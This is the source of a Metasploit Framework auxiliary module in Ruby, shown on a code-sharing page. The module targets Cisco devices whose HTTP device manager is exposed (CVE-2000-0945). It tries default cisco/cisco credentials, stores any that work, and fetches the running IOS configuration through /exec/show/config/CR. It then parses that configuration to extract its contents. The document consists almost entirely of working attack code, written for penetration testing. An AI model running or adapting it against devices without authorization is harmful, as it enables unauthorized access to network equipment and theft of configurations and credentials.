Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/cisco_device_manager.rb
19851 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7


8
  # Exploit mixins should be called first

9
  include Msf::Exploit::Remote::HttpClient

10


11
  # Include Cisco utility methods

12
  include Msf::Auxiliary::Cisco

13


14
  # Scanner mixin should be near last

15
  include Msf::Auxiliary::Scanner

16


17
  def initialize(info = {})

18
    super(

19
      update_info(

20
        info,

21
        'Name' => 'Cisco Device HTTP Device Manager Access',

22
        'Description' => %q{

23
          This module gathers data from a Cisco device (router or switch) with the device manager

24
          web interface exposed. The HttpUsername and HttpPassword options can be used to specify

25
          authentication.

26
        },

27
        'Author'	=> [ 'hdm' ],

28
        'License'	=> MSF_LICENSE,

29
        'References' => [

30
          [ 'BID', '1846'],

31
          [ 'CVE', '2000-0945'],

32
          [ 'OSVDB', '444'],

33
        ],

34
        'DisclosureDate' => '2000-10-26',

35
        'Notes' => {

36
          'Reliability' => UNKNOWN_RELIABILITY,

37
          'Stability' => UNKNOWN_STABILITY,

38
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

39
        }

40
      )

41
    )

42
    register_options(

43
      [

44
        OptString.new('HttpUsername', [true, 'The HTTP username to specify for basic authentication', 'cisco']),

45
        OptString.new('HttpPassword', [true, 'The HTTP password to specify for basic authentication', 'cisco'])

46
      ]

47
    )

48
  end

49


50
  def run_host(ip)

51
    res = send_request_cgi({

52
      'uri' => "/exec/show/version/CR",

53
      'method' => 'GET'

54
    }, 20)

55


56
    if res and res.code == 401

57
      print_error("#{rhost}:#{rport} Failed to authenticate to this device")

58
      return

59
    end

60


61
    if res and res.code != 200

62
      print_error("#{rhost}:#{rport} Unexpected response code from this device #{res.code}")

63
      return

64
    end

65


66
    if res and res.body and res.body =~ /Cisco (Internetwork Operating System|IOS) Software/

67
      print_good("#{rhost}:#{rport} Successfully authenticated to this device")

68
      store_valid_credential(user: datastore['HttpUsername'], private: datastore['HttpPassword'])

69


70
      # Report a vulnerability only if no password was specified

71
      if datastore['HttpPassword'].to_s.length == 0

72


73
        report_vuln(

74
          {

75
            :host	=> rhost,

76
            :port	=> rport,

77
            :proto => 'tcp',

78
            :name	=> self.name,

79
            :info	=> "Module #{self.fullname} successfully accessed http://#{rhost}:#{rport}/exec/show/version/CR",

80
            :refs => self.references,

81
            :exploited_at => Time.now.utc

82
          }

83
        )

84


85
      end

86


87
      res = send_request_cgi({

88
        'uri' => "/exec/show/config/CR",

89
        'method' => 'GET'

90
      }, 20)

91


92
      if res and res.body and res.body =~ /<FORM METHOD([^\>]+)\>(.*)/mi

93
        config = $2.gsub(/<\/[A-Z].*/i, '').strip

94
        print_good("#{rhost}:#{rport} Processing the configuration file...")

95
        cisco_ios_config_eater(rhost, rport, config)

96
      else

97
        print_error("#{rhost}:#{rport} Error: could not retrieve the IOS configuration")

98
      end

99


100
    end

101
  end

102
end

103


104